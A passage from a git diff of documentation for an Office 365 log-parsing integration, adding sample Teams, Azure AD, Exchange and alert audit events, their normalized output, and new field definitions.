"a84a7a26-d1f0-4d45-a875-481355e2d96c" + }, + "related": { + "ip": [ + "dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b" + ], + "user": [ + "c5a134b1-6eb3-4558-95e5-7f3f04219cf2" + ] + }, + "service": { + "name": "MicrosoftTeams" + }, + "source": { + "address": "dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b", + "ip": "dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b" + }, + "user": { + "id": "c5a134b1-6eb3-4558-95e5-7f3f04219cf2", + "name": "c5a134b1-6eb3-4558-95e5-7f3f04219cf2" + } + } + + ``` + + +=== "teams_with_foreign_tenant_users_2.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-07-12T08:27:46\", \"Id\": \"5964f7bd-8775-4dbe-84a8-37573510558c\", \"Operation\": \"ChatCreated\", \"OrganizationId\": \"456bd527-0a31-47c3-b369-0c04b30849ac\", \"RecordType\": 25, \"UserKey\": \"413e1939-c450-4d63-8226-b02a542e6a9a\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"john.doe@example1.com\", \"ChatThreadId\": 
\"19:9ac303ea-1bf3-442c-a216-a517de868921_413e1939-c450-4d63-8226-b02a542e6a9a@unq.gbl.spaces\", \"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Berlin\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"NT 10.0\"}, {\"Key\": \"Country\", \"Value\": \"de\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"49/24061318408\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"Members\": [{\"OrganizationId\": \"456bd527-0a31-47c3-b369-0c04b30849ac\", \"DisplayName\": \"John Doe\", \"UPN\": \"john.doe@example1.com\"}, {\"OrganizationId\": \"f35fe983-e797-44ce-bd0b-cf4da93a8043\", \"DisplayName\": \"Jane Doe\", \"UPN\": \"jane.doe@example2.com\"}], \"ParticipantInfo\": {\"HasForeignTenantUsers\": true, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [\"example1.com\", \"example2.com\"], \"ParticipatingSIPDomains\": [{\"DomainName\": \"example1.com\", \"TenantId\": \"456bd527-0a31-47c3-b369-0c04b30849ac\"}, {\"DomainName\": \"example2.com\", \"TenantId\": \"f35fe983-e797-44ce-bd0b-cf4da93a8043\"}], \"ParticipatingTenantIds\": [\"f35fe983-e797-44ce-bd0b-cf4da93a8043\", \"456bd527-0a31-47c3-b369-0c04b30849ac\"]}, \"ResourceTenantId\": \"456bd527-0a31-47c3-b369-0c04b30849ac\", \"ItemName\": \"19:9ac303ea-1bf3-442c-a216-a517de868921_413e1939-c450-4d63-8226-b02a542e6a9a@unq.gbl.spaces\"}", + "event": { + "action": "ChatCreated", + "category": [ + "network" + ], + "code": "25", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-12T08:27:46Z", + "action": { + "id": 25, + "name": "ChatCreated", + "outcome": "success", + "target": "network-traffic" + }, + "office365": { + "record_type": 25, + "teams": { + "communication": { + "type": "OneOnOne" + }, + "has_foreign_tenant_users": true, + "team": { + "members": [ + { + "id": 
"john.doe@example1.com", + "name": "John Doe" + }, + { + "id": "jane.doe@example2.com", + "name": "Jane Doe" + } + ] + } + }, + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "456bd527-0a31-47c3-b369-0c04b30849ac" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@example1.com" + ] + }, + "service": { + "name": "MicrosoftTeams" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@example1.com", + "id": "413e1939-c450-4d63-8226-b02a542e6a9a", + "name": "john.doe@example1.com" + } + } + + ``` + + +=== "teams_with_foreign_tenant_users_3.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-07-12T08:27:37\", \"Id\": \"db1cd437-5417-4cd3-ae6b-19a980f9bcfc\", \"Operation\": \"ChatCreated\", \"OrganizationId\": \"41847cb3-0096-48f2-82d0-c4f1bf92e031\", \"RecordType\": 25, \"UserKey\": \"4daf1829-8823-454f-b4e0-1cd22342d5f3\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"1.2.3.4\", \"UserId\": \"john.doe@example1.com\", \"ChatThreadId\": \"19:d473ae3c-906c-4a72-8b3f-18e6c9bfdcd7_4daf1829-8823-454f-b4e0-1cd22342d5f3@unq.gbl.spaces\", \"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Berlin\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"NT 10.0\"}, {\"Key\": \"Country\", \"Value\": \"de\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"49/24061318408\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"Members\": [{\"OrganizationId\": \"41847cb3-0096-48f2-82d0-c4f1bf92e031\", \"DisplayName\": \"John Doe\", \"UPN\": \"john.doe@example1.com\"}, {\"OrganizationId\": \"1d36ca61-5509-4ac7-983d-91dfdeb5f492\", \"DisplayName\": \"Jane Doe\", \"UPN\": \"jane.doe@example2.com\"}], \"ParticipantInfo\": {\"HasForeignTenantUsers\": true, \"HasGuestUsers\": false, 
\"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [\"example1.com\", \"example2.com\"], \"ParticipatingSIPDomains\": [{\"DomainName\": \"example1.com\", \"TenantId\": \"41847cb3-0096-48f2-82d0-c4f1bf92e031\"}, {\"DomainName\": \"example2.com\", \"TenantId\": \"1d36ca61-5509-4ac7-983d-91dfdeb5f492\"}], \"ParticipatingTenantIds\": [\"1d36ca61-5509-4ac7-983d-91dfdeb5f492\", \"41847cb3-0096-48f2-82d0-c4f1bf92e031\"]}, \"ResourceTenantId\": \"41847cb3-0096-48f2-82d0-c4f1bf92e031\", \"ItemName\": \"19:d473ae3c-906c-4a72-8b3f-18e6c9bfdcd7_4daf1829-8823-454f-b4e0-1cd22342d5f3@unq.gbl.spaces\"}", + "event": { + "action": "ChatCreated", + "category": [ + "network" + ], + "code": "25", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-12T08:27:37Z", + "action": { + "id": 25, + "name": "ChatCreated", + "outcome": "success", + "target": "network-traffic" + }, + "office365": { + "record_type": 25, + "teams": { + "communication": { + "type": "OneOnOne" + }, + "has_foreign_tenant_users": true, + "team": { + "members": [ + { + "id": "john.doe@example1.com", + "name": "John Doe" + }, + { + "id": "jane.doe@example2.com", + "name": "Jane Doe" + } + ] + } + }, + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "41847cb3-0096-48f2-82d0-c4f1bf92e031" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@example1.com" + ] + }, + "service": { + "name": "MicrosoftTeams" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@example1.com", + "id": "4daf1829-8823-454f-b4e0-1cd22342d5f3", + "name": "john.doe@example1.com" + } + } + + ``` + + +=== "teams_without_foreign_tenant_users.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-06-10T12:14:57\", \"Id\": \"f47118c3-edcf-43a9-b505-c7c904231ac2\", \"Operation\": \"ChatCreated\", \"OrganizationId\": \"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\", \"RecordType\": 25, 
\"UserKey\": \"70de41a7-73c7-4532-8257-25ec88456e99\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"194.169.176.18\", \"UserId\": \"jdoe_example.org#EXT#@example.onmicrosoft.com\", \"ChatThreadId\": \"19:0f738a46-74e0-45cf-a5e7-ff31eb2d9cdb_e574a199-c965-4fe2-8c02-0a98a1e8f597@unq.gbl.spaces\", \"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Paris\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"NT 10.0\"}, {\"Key\": \"Country\", \"Value\": \"fr\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"49/24051622207\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"Members\": [{\"OrganizationId\": \"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\", \"DisplayName\": \"John Doe\", \"UPN\": \"jdoe_example.org#EXT#@example.onmicrosoft.com\"}, {\"OrganizationId\": \"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\", \"DisplayName\": \"Jane Doe\", \"UPN\": \"jane.doe@example.org\"}], \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": true, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\"]}, \"ResourceTenantId\": \"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1\", \"ItemName\": \"19:0f738a46-74e0-45cf-a5e7-ff31eb2d9cdb_e574a199-c965-4fe2-8c02-0a98a1e8f597@unq.gbl.spaces\"}", + "event": { + "action": "ChatCreated", + "category": [ + "network" + ], + "code": "25", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-10T12:14:57Z", + "action": { + "id": 25, + "name": "ChatCreated", + "outcome": "success", + "target": "network-traffic" + }, + "office365": { + "record_type": 25, + "teams": { + "communication": { + "type": "OneOnOne" + }, + "has_foreign_tenant_users": false, + "team": { + "members": [ + { + "id": 
"jdoe_example.org#EXT#@example.onmicrosoft.com", + "name": "John Doe" + }, + { + "id": "jane.doe@example.org", + "name": "Jane Doe" + } + ] + } + }, + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1" + }, + "related": { + "ip": [ + "194.169.176.18" + ], + "user": [ + "jdoe_example.org#EXT#@example.onmicrosoft.com" + ] + }, + "service": { + "name": "MicrosoftTeams" + }, + "source": { + "address": "194.169.176.18", + "ip": "194.169.176.18" + }, + "user": { + "email": "jdoe_example.org#EXT#@example.onmicrosoft.com", + "id": "70de41a7-73c7-4532-8257-25ec88456e99", + "name": "jdoe_example.org#EXT#@example.onmicrosoft.com" + } + } + + ``` + + === "threat_intel.json" ```json 
@@ -2812,7 +3436,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2021-03-05T14:43:17\",\"Id\":\"21a107c2-2071-4ce3-8330-cf82f3caa79f\",\"Operation\":\"Update user.\",\"OrganizationId\":\"3e49b082-62d5-4849-a5b0-86ed519287d2\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"UserKey\":\"10030000A96EA230@domain.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"\",\"ObjectId\":\"aaaa.bbbb@example.org\",\"UserId\":\"user@domain.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\":[{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"UserType\\\":\\\"Member\\\"}\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"}],\"ModifiedProperties\":[{\"Name\":\"LastDirSyncTime\",\"NewValue\":\"[\\r\\n \\\"2021-03-05T14:43:17Z\\\"\\r\\n]\",\"OldValue\":\"[\\r\\n \\\"2021-03-03T12:30:50Z\\\"\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"LastDirSyncTime\",\"OldValue\":\"\"},{\"Name\":\"Action Client 
Name\",\"NewValue\":\"DirectorySync\",\"OldValue\":\"\"},{\"Name\":\"TargetId.UserType\",\"NewValue\":\"Member\",\"OldValue\":\"\"}],\"Actor\":[{\"ID\":\"user@domain.onmicrosoft.com\",\"Type\":5},{\"ID\":\"10030000A96EA230\",\"Type\":3},{\"ID\":\"User_c96cf894-cca6-438b-b6f2-c2744c1680f5\",\"Type\":2},{\"ID\":\"c96cf894-cca6-438b-b6f2-c2744c1680f5\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"3e49b082-62d5-4849-a5b0-86ed519287d2\",\"ActorIpAddress\":\"\",\"InterSystemsId\":\"92d46438-1e67-43e3-91ca-039ff39d7217\",\"IntraSystemId\":\"bd8cc421-efe8-4a44-b61d-44670fc6f56e\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_de76d2a9-d8bf-47d4-8f74-2ba2b560f55e\",\"Type\":2},{\"ID\":\"de76d2a9-d8bf-47d4-8f74-2ba2b560f55e\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"aaaa.bbbb@example.org\",\"Type\":5},{\"ID\":\"1003200119762B26\",\"Type\":3}],\"TargetContextId\":\"3e49b082-62d5-4849-a5b0-86ed519287d2\"}", + "message": "{\"CreationTime\": \"2021-03-05T14:43:17\", \"Id\": \"21a107c2-2071-4ce3-8330-cf82f3caa79f\", \"Operation\": \"Update user.\", \"OrganizationId\": \"3e49b082-62d5-4849-a5b0-86ed519287d2\", \"RecordType\": 8, \"ResultStatus\": \"Success\", \"UserKey\": \"10030000A96EA230@domain.onmicrosoft.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ClientIP\": \"\", \"ObjectId\": \"aaaa.bbbb@example.org\", \"UserId\": \"user@domain.onmicrosoft.com\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"additionalDetails\", \"Value\": \"{\\\"UserType\\\":\\\"Member\\\"}\"}, {\"Name\": \"extendedAuditEventCategory\", \"Value\": \"User\"}], \"ModifiedProperties\": [{\"Name\": \"LastDirSyncTime\", \"NewValue\": \"[\\r\\n \\\"2021-03-05T14:43:17Z\\\"\\r\\n]\", \"OldValue\": \"[\\r\\n \\\"2021-03-03T12:30:50Z\\\"\\r\\n]\"}, {\"Name\": \"Included Updated Properties\", \"NewValue\": \"LastDirSyncTime\", \"OldValue\": \"\"}, {\"Name\": \"Action Client Name\", \"NewValue\": \"DirectorySync\", 
\"OldValue\": \"\"}, {\"Name\": \"TargetId.UserType\", \"NewValue\": \"Member\", \"OldValue\": \"\"}], \"Actor\": [{\"ID\": \"user@domain.onmicrosoft.com\", \"Type\": 5}, {\"ID\": \"10030000A96EA230\", \"Type\": 3}, {\"ID\": \"User_c96cf894-cca6-438b-b6f2-c2744c1680f5\", \"Type\": 2}, {\"ID\": \"c96cf894-cca6-438b-b6f2-c2744c1680f5\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}], \"ActorContextId\": \"3e49b082-62d5-4849-a5b0-86ed519287d2\", \"ActorIpAddress\": \"\", \"InterSystemsId\": \"92d46438-1e67-43e3-91ca-039ff39d7217\", \"IntraSystemId\": \"bd8cc421-efe8-4a44-b61d-44670fc6f56e\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"User_de76d2a9-d8bf-47d4-8f74-2ba2b560f55e\", \"Type\": 2}, {\"ID\": \"de76d2a9-d8bf-47d4-8f74-2ba2b560f55e\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}, {\"ID\": \"aaaa.bbbb@example.org\", \"Type\": 5}, {\"ID\": \"1003200119762B26\", \"Type\": 3}], \"TargetContextId\": \"3e49b082-62d5-4849-a5b0-86ed519287d2\"}", "event": { "action": "Update user.", "category": [ @@ -2838,7 +3462,29 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "context": { "correlation": { "id": "92d46438-1e67-43e3-91ca-039ff39d7217" - } + }, + "modified_properties": [ + { + "Name": "LastDirSyncTime", + "NewValue": "[\r\n \"2021-03-05T14:43:17Z\"\r\n]", + "OldValue": "[\r\n \"2021-03-03T12:30:50Z\"\r\n]" + }, + { + "Name": "Included Updated Properties", + "NewValue": "LastDirSyncTime", + "OldValue": "" + }, + { + "Name": "Action Client Name", + "NewValue": "DirectorySync", + "OldValue": "" + }, + { + "Name": "TargetId.UserType", + "NewValue": "Member", + "OldValue": "" + } + ] }, "record_type": 8, "result_status": "Success", 
@@ -3065,7 +3711,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2022-10-14T13:48:03\",\"Id\":\"4af0b443-42dd-4dc6-9bd1-751a55441000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"785d81fb-82aa-4ff3-9cbc-e3280761f36a\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"20.250.8.183\",\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"UserId\":\"user@mycompany.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\":[{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"SAS:EndAuth\"}],\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"785d81fb-82aa-4ff3-9cbc-e3280761f36a\",\"Type\":0},{\"ID\":\"user@mycompany.com\",\"Type\":5}],\"ActorContextId\":\"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\",\"ActorIpAddress\":\"20.250.8.183\",\"InterSystemsId\":\"d48e6ea0-40c1-5000-5eba-0ee33d13b1ca\",\"IntraSystemId\":\"4af0b443-42dd-4dc6-9bd1-751a55441000\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"DeviceProperties\":[{\"Name\":\"OS\",\"Value\":\"Windows 10\"},{\"Name\":\"BrowserType\",\"Value\":\"Firefox\"},{\"Name\":\"IsCompliantAndManaged\",\"Value\":\"False\"},{\"Name\":\"SessionId\",\"Value\":\"b3a9b2b4-57c9-406b-9a2d-106b7f612248\"}],\"ErrorNumber\":\"500121\",\"LogonError\":\"AuthenticationFailedSasError\"}", + "message": "{\"CreationTime\": \"2022-10-14T13:48:03\", \"Id\": \"4af0b443-42dd-4dc6-9bd1-751a55441000\", \"Operation\": \"UserLoginFailed\", 
\"OrganizationId\": \"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\", \"RecordType\": 15, \"ResultStatus\": \"Success\", \"UserKey\": \"785d81fb-82aa-4ff3-9cbc-e3280761f36a\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ClientIP\": \"20.250.8.183\", \"ObjectId\": \"00000003-0000-0ff1-ce00-000000000000\", \"UserId\": \"user@mycompany.com\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"ResultStatusDetail\", \"Value\": \"Success\"}, {\"Name\": \"UserAgent\", \"Value\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\"}, {\"Name\": \"UserAuthenticationMethod\", \"Value\": \"1\"}, {\"Name\": \"RequestType\", \"Value\": \"SAS:EndAuth\"}], \"ModifiedProperties\": [], \"Actor\": [{\"ID\": \"785d81fb-82aa-4ff3-9cbc-e3280761f36a\", \"Type\": 0}, {\"ID\": \"user@mycompany.com\", \"Type\": 5}], \"ActorContextId\": \"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\", \"ActorIpAddress\": \"20.250.8.183\", \"InterSystemsId\": \"d48e6ea0-40c1-5000-5eba-0ee33d13b1ca\", \"IntraSystemId\": \"4af0b443-42dd-4dc6-9bd1-751a55441000\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"00000003-0000-0ff1-ce00-000000000000\", \"Type\": 0}], \"TargetContextId\": \"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\", \"ApplicationId\": \"00000003-0000-0ff1-ce00-000000000000\", \"DeviceProperties\": [{\"Name\": \"OS\", \"Value\": \"Windows 10\"}, {\"Name\": \"BrowserType\", \"Value\": \"Firefox\"}, {\"Name\": \"IsCompliantAndManaged\", \"Value\": \"False\"}, {\"Name\": \"SessionId\", \"Value\": \"b3a9b2b4-57c9-406b-9a2d-106b7f612248\"}], \"ErrorNumber\": \"500121\", \"LogonError\": \"AuthenticationFailedSasError\"}", "event": { "action": "UserLoginFailed", "category": [ 
@@ -3203,6 +3849,7 @@ The following table lists the fields that are extracted, normalized under the EC |`office365.alert.description` | `keyword` | | |`office365.alert.display_name` | `keyword` | | |`office365.alert.entity_type` | `keyword` | | +|`office365.alert.id` | `keyword` | | |`office365.alert.severity` | `keyword` | | |`office365.alert.source` | `keyword` | | |`office365.alert.status` | `keyword` | | @@ -3220,6 +3867,7 @@ The following table lists the fields that are extracted, normalized under the EC |`office365.context.client.id` | `keyword` | The identifier of Azure Active Directory application | |`office365.context.client.name` | `keyword` | The name of Azure Active Directory application | |`office365.context.correlation.id` | `keyword` | The identifier to correlate user's action across Microsoft 365 services | +|`office365.context.modified_properties` | `array` | | |`office365.defender.additional_actions` | `array` | The additional actions taken on the email | |`office365.defender.auth_details` | `array` | The authentication checks that are done for the email | |`office365.defender.connectors` | `keyword` | Identifiers of connectors associated with the email | @@ -3244,7 +3892,6 @@ The following table lists the fields that are extracted, normalized under the EC |`office365.exchange.email.paths` | `array` | | |`office365.exchange.email.subjects` | `array` | A list of email subjects | |`office365.exchange.mailbox_guid` | `keyword` | | -|`office365.exchange.modified_properties` | `array` | | |`office365.exchange_admin.parameters` | `array` | The parameters that were used with the cmdlet that is identified in the event.action field | |`office365.form_name` | `keyword` | | |`office365.investigation.alert.category` | `keyword` | Investigation alert category | 
@@ -3274,6 +3921,7 @@ The following table lists the fields that are extracted, normalized under the EC |`office365.teams.channel.name` | `keyword` | The name of the channel | |`office365.teams.channel.type` | `keyword` | The type of the channel | |`office365.teams.communication.type` | `keyword` | The type of communication | +|`office365.teams.has_foreign_tenant_users` | `boolean` | | |`office365.teams.invitee` | `keyword` | The identifier of an invitee | |`office365.teams.message.id` | `keyword` | The identifier of the message | |`office365.teams.message.size` | `long` | The size of the message in bytes with UTF-16 encoding | @@ -3296,6 +3944,7 @@ The following table lists the fields that are extracted, normalized under the EC |`source.user.email` | `keyword` | User email address. | |`url.full` | `wildcard` | Full unparsed URL. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.email` | `keyword` | User email address. | |`user.id` | `keyword` | Unique identifier of the user. | |`user.name` | `keyword` | Short name or login of the user. | diff --git a/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99_sample.md b/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99_sample.md index ff9a4d0437..5b261dcb81 100644 --- a/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99_sample.md +++ b/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99_sample.md 
@@ -159,6 +159,110 @@ In this section, you will find examples of raw logs as generated natively by the +=== "add_member_to_role" + + + ```json + { + "CreationTime": "2024-07-10T14:25:49", + "Id": "b4f48141-a2fe-4d47-9f0d-f09f26307035", + "Operation": "Add member to role.", + "OrganizationId": "f35698e3-5049-4b7f-b26b-9e9784705086", + "RecordType": 8, + "ResultStatus": "Success", + "UserKey": "key@example.com", + "UserType": 0, + "Version": 1, + "Workload": "AzureActiveDirectory", + "ObjectId": "john.doe@example.com", + "UserId": "admin@example.com", + "AzureActiveDirectoryEventType": 1, + "ExtendedProperties": [ + { + "Name": "additionalDetails", + "Value": "{}" + }, + { + "Name": "extendedAuditEventCategory", + "Value": "Role" + } + ], + "ModifiedProperties": [ + { + "Name": "Role.ObjectID", + "NewValue": "54fc7176-29ef-4b41-808f-3cdeb8010649", + "OldValue": "" + }, + { + "Name": "Role.DisplayName", + "NewValue": "Global Administrator", + "OldValue": "" + }, + { + "Name": "Role.TemplateId", + "NewValue": "ad1cbca4-efcc-4149-b4a2-aeb40412fe48", + "OldValue": "" + }, + { + "Name": "Role.WellKnownObjectName", + "NewValue": "TenantAdmins", + "OldValue": "" + } + ], + "Actor": [ + { + "ID": "admin@example.com", + "Type": 5 + }, + { + "ID": "100320029D963D0D", + "Type": 3 + }, + { + "ID": "User_576409b5-84f3-4791-8e3c-c9677e3bd898", + "Type": 2 + }, + { + "ID": "576409b5-84f3-4791-8e3c-c9677e3bd898", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + } + ], + "ActorContextId": "f35698e3-5049-4b7f-b26b-9e9784705086", + "InterSystemsId": "5a0910e4-c125-4b46-9616-0232d14915dc", + "IntraSystemId": "fb6cd132-f8e8-4ec5-9a0b-4ec8397e1405", + "SupportTicketId": "", + "Target": [ + { + "ID": "User_46522b15-1bf5-4bed-8a6c-4edc58c05b23", + "Type": 2 + }, + { + "ID": "46522b15-1bf5-4bed-8a6c-4edc58c05b23", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + }, + { + "ID": "john.doe@example.com", + "Type": 5 + }, + { + "ID": "100320029D9D1C86", + "Type": 3 + } + ], + 
"TargetContextId": "f35698e3-5049-4b7f-b26b-9e9784705086" + } + ``` + + + === "automated_investigation_and_response" @@ -307,6 +411,71 @@ In this section, you will find examples of raw logs as generated natively by the +=== "clientipadress" + + + ```json + { + "CreationTime": "2024-06-26T06:29:14", + "Id": "xxxx-xxx-xxx-xxxx", + "Operation": "MailItemsAccessed", + "OrganizationId": "xxxx-xxx-xxx-xxxx", + "RecordType": 50, + "ResultStatus": "Succeeded", + "UserKey": "xxxx-xxx-xxx-xxxx", + "UserType": 5, + "Version": 1, + "Workload": "Exchange", + "UserId": "user@mail.fr", + "AppId": "xxxx-xxx-xxx-xxxx", + "ClientAppId": "clientappidxxxx-xxx-xxx-xxxx", + "ClientIPAddress": "1000:1000:100:007::1", + "ClientInfoString": "Client=Exemple1;Client=Exemple2;;", + "ExternalAccess": "False", + "InternalLogonType": 0, + "LogonType": 0, + "LogonUserSid": "S-1-5-21-xxxx-xxx-xxx-xxxx", + "MailboxGuid": "xxxx-xxx-xxx-xxxx", + "MailboxOwnerSid": "S-1-5-21-xxxx-xxx-xxx-xxxx", + "MailboxOwnerUPN": "user@mail.fr", + "OperationProperties": [ + { + "Name": "MailAccessType", + "Value": "Bind" + }, + { + "Name": "IsThrottled", + "Value": "False" + } + ], + "OrganizationName": "organization.microsoft.com", + "OriginatingServer": "server (0.0.0000.000)\r\n", + "Folders": [ + { + "FolderItems": [ + { + "ClientRequestId": "xxxx-xxx-xxx-xxxx", + "Id": "aaaaaaaaaaaaa", + "InternetMessageId": "xxxxx@exemple.com", + "SizeInBytes": 127625 + }, + { + "ClientRequestId": "xxxx-xxx-xxx-xxxx", + "Id": "aaaaaaaaaaaaaaaaaa", + "InternetMessageId": "xxxx-xxx-xxx-xxxx@enterprise.net", + "SizeInBytes": 147360 + } + ], + "Id": "aaaaaaaaaaaaaaaaaaaa", + "Path": "Boite de reception" + } + ], + "OperationCount": 2 + } + ``` + + + === "compliancemanager-scorechange" 
@@ -339,6 +508,39 @@ In this section, you will find examples of raw logs as generated natively by the +=== "email_reported" + + + ```json + { + "CreationTime": "2024-05-24T06:29:22", + "Id": "03604c8d-ed69-466b-a9f4-80467c958739", + "Operation": "AlertUpdated", + "OrganizationId": "4f962933-707f-4441-8d56-bb178a2ed0b9", + "RecordType": 40, + "ResultStatus": "Succeeded", + "UserKey": "SecurityComplianceAlerts", + "UserType": 4, + "Version": 1, + "Workload": "SecurityComplianceCenter", + "ObjectId": "f54a9b97-a432-471b-a84a-ddcba13f5f35", + "UserId": "SecurityComplianceAlerts", + "AlertId": "2c7f6c46-33d7-4101-b2fc-0af27eaf308a", + "AlertLinks": [], + "AlertType": "System", + "Category": "ThreatManagement", + "Comments": "New alert", + "Data": "{\"f3u\":\"john.doe@example.com\",\"ts\":\"2024-05-24T05:44:00Z\",\"te\":\"2024-05-24T05:45:00Z\",\"op\":\"UserSubmission\",\"wl\":\"SecurityComplianceCenter\",\"tid\":\"8a1a1157-0272-492d-ab10-3f9853ac8183\",\"tdc\":\"1\",\"reid\":\"a04c1571-7271-445e-82e3-c39f848aceb8\",\"wsrt\":\"2024-05-24T05:45:22\",\"mdt\":\"Audit\",\"rid\":\"9a36861c-cc4d-4818-be4a-a20555480a00\",\"cid\":\"2b6fda52-8386-4213-b6fb-2fcb078571c4\",\"ad\":\"This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.3\",\"lon\":\"UserSubmission\",\"an\":\"Email reported by user as malware or 